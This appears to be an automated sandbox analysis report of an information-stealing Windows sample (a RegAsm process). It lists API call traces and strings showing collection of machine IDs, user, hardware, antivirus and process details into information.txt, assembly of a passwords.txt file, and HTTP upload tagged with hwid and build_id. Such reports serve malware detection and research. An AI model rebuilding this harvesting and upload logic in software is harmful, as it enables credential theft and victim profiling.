GetProcAddress.KERNEL32 ref: 0041860B
GetProcAddress.KERNEL32 ref: 00418622
GetProcAddress.KERNEL32 ref: 00418639
GetProcAddress.KERNEL32 ref: 00418650
GetProcAddress.KERNEL32 ref: 00418667
GetProcAddress.KERNEL32 ref: 0041867E
GetProcAddress.KERNEL32 ref: 00418695
GetProcAddress.KERNEL32 ref: 004186AC
GetProcAddress.KERNEL32 ref: 004186C3
GetProcAddress.KERNEL32 ref: 004186DA
GetProcAddress.KERNEL32 ref: 004186F1
GetProcAddress.KERNEL32 ref: 00418708
GetProcAddress.KERNEL32 ref: 0041871F
GetProcAddress.KERNEL32 ref: 00418736
LoadLibraryA.KERNEL32(?,004183BF), ref: 00418747
LoadLibraryA.KERNEL32(?,004183BF), ref: 00418758
LoadLibraryA.KERNEL32(?,004183BF), ref: 00418769
LoadLibraryA.KERNEL32(?,004183BF), ref: 0041877A
LoadLibraryA.KERNEL32(?,004183BF), ref: 0041878B
GetProcAddress.KERNEL32(75B30000,004183BF), ref: 004187A7
GetProcAddress.KERNEL32(751E0000,004183BF), ref: 004187C2
GetProcAddress.KERNEL32 ref: 004187D9
GetProcAddress.KERNEL32(76910000,004183BF), ref: 004187F4
GetProcAddress.KERNEL32(75670000,004183BF), ref: 0041880F
GetProcAddress.KERNEL32(77310000,004183BF), ref: 0041882A
GetProcAddress.KERNEL32 ref: 00418841

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 488f3bf8be5203566043c76790f6321334dcb3e97e11de53b1080baca68fcbfd
Instruction ID: d46c06863cb5eb778ca4a7be8cede16553f3cd33357f93be2959eb9d743ece4e
Opcode Fuzzy Hash: 488f3bf8be5203566043c76790f6321334dcb3e97e11de53b1080baca68fcbfd
Instruction Fuzzy Hash: B271C376402304AFEB02AFA1FC48A653FB7F70870371091AAE94593631EF765864EF94

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,004366DF,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(?), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436703,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00436702,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,?,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,?,?,?,?,00436E8C), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416DAB: CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
Part of subcall function 00416DAB: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

Strings

Local Time: , xrefs: 0041414B
Computer Name: , xrefs: 00413FAD
information.txt, xrefs: 00414573
AV: , xrefs: 00413F3E
Path: , xrefs: 00413DBB
GUID: , xrefs: 00413CE1
MachineID: , xrefs: 00413C80
Cores: , xrefs: 0041428E
RAM: , xrefs: 00414350
Keyboard Languages: , xrefs: 004140DE
User Name: , xrefs: 0041400E
[Hardware], xrefs: 0041420D
[Software], xrefs: 004144A3
Work Dir: In memory, xrefs: 00413E30
Windows: , xrefs: 00413E70
VideoCard: , xrefs: 004143B7
TimeZone: , xrefs: 004141AC
Date: , xrefs: 00413C1F
Install Date: , xrefs: 00413ED1
Processor: , xrefs: 0041422D
[Processes], xrefs: 0041442A
Display Resolution: , xrefs: 0041406F
Version: , xrefs: 00413B9F
HWID: , xrefs: 00413D4E
Threads: , xrefs: 004142EF

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 681701770-1014693891
Opcode ID: 76156a0050c6619714a064f0b4864deafab58003a27d3c6be28a4f62833c7b02
Instruction ID: 06481fa9062bb2e44bf305b429e48b5d92c361440aa9d8210dad30f01435ebcf
Opcode Fuzzy Hash: 76156a0050c6619714a064f0b4864deafab58003a27d3c6be28a4f62833c7b02
Instruction Fuzzy Hash: CC527E71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB510771A1DBB87E8E8B98

Function 00416780 Relevance: 47.6, APIs: 10, Strings: 17, Instructions: 331
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00416690: StrCmpCA.SHLWAPI(?,ERROR), ref: 004166E4
Part of subcall function 00416690: lstrlenA.KERNEL32(?), ref: 004166EF
Part of subcall function 00416690: StrStrA.SHLWAPI(00000000,?), ref: 00416704
Part of subcall function 00416690: lstrlenA.KERNEL32(?), ref: 00416713
Part of subcall function 00416690: lstrlenA.KERNEL32(00000000), ref: 0041672C

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041686A
StrCmpCA.SHLWAPI(?,ERROR), ref: 004168C3
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416923
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041697C
StrCmpCA.SHLWAPI(?,ERROR), ref: 004169DC
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416A35
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416A4B

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00416608: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041663D

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AAB
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B04
Sleep.KERNEL32(0000EA60), ref: 00416B13

Strings

ERROR, xrefs: 004169D4
ERROR, xrefs: 00416A43
ERROR, xrefs: 00416974
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416B29
sql.dll, xrefs: 00416C12
sqlp.dll, xrefs: 00416B48
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416B91
ERROR, xrefs: 0041691B
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416BC2
ERROR, xrefs: 00416AFC
ERROR, xrefs: 00416862
ERROR, xrefs: 004168BB
ERROR, xrefs: 00416A2D
ERROR, xrefs: 00416AA3
BuA, xrefs: 00416C31
sqlp.dll, xrefs: 00416BE1
sqlp.dll, xrefs: 00416BB0

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: BuA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sql.dll$sqlp.dll$sqlp.dll$sqlp.dll
API String ID: 507064821-220444786
Opcode ID: 4057b3cfde2f19dffdaad1d453f7298f778141a478524e01a3cab5e962dd5bba
Instruction ID: 8f1fc40a5b07296545ea9ff3e602bd4fa844ce5bd521e7c66ee74d1a08d31ec8
Opcode Fuzzy Hash: 4057b3cfde2f19dffdaad1d453f7298f778141a478524e01a3cab5e962dd5bba
Instruction Fuzzy Hash: C6C10D71E40119ABCF10FB66DD47ACC7771AF04308F52406BB914B7192DBB8AE898F99

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366D6,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437198,00436745,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: 06f1f5cc9f8fcec13509eccc524afa5a1e8ef13386d846e987ebd5b6cea46317
Instruction ID: 58836571871b704a69829a6cb8ce076c518e3dfb4c7a046bf2e6f5906dc9aa93
Opcode Fuzzy Hash: 06f1f5cc9f8fcec13509eccc524afa5a1e8ef13386d846e987ebd5b6cea46317
Instruction Fuzzy Hash: D7812E72900208AFCF02BBA1ED4AADD7F76EF08316F104066F601B31A1DF795E559B99

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

InternetOpenA.WININET(.iC+iC*iC)iC,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00404DF5

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

lstrlenA.KERNEL32(?,0043693D,",build_id,004377C4,------,004377B8,",hwid,004377A4,------), ref: 004050EE
lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
InternetCloseHandle.WININET(00000000), ref: 00405177
InternetCloseHandle.WININET(?), ref: 0040518E
InternetCloseHandle.WININET(?), ref: 0040519A

Strings

------, xrefs: 00404C75
", xrefs: 00404ED9
------, xrefs: 00404F5B
", xrefs: 00405039
build_id, xrefs: 0040500D
------, xrefs: 00404DFB
.iC+iC*iC)iC, xrefs: 00404BCA
hwid, xrefs: 00404EAD

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
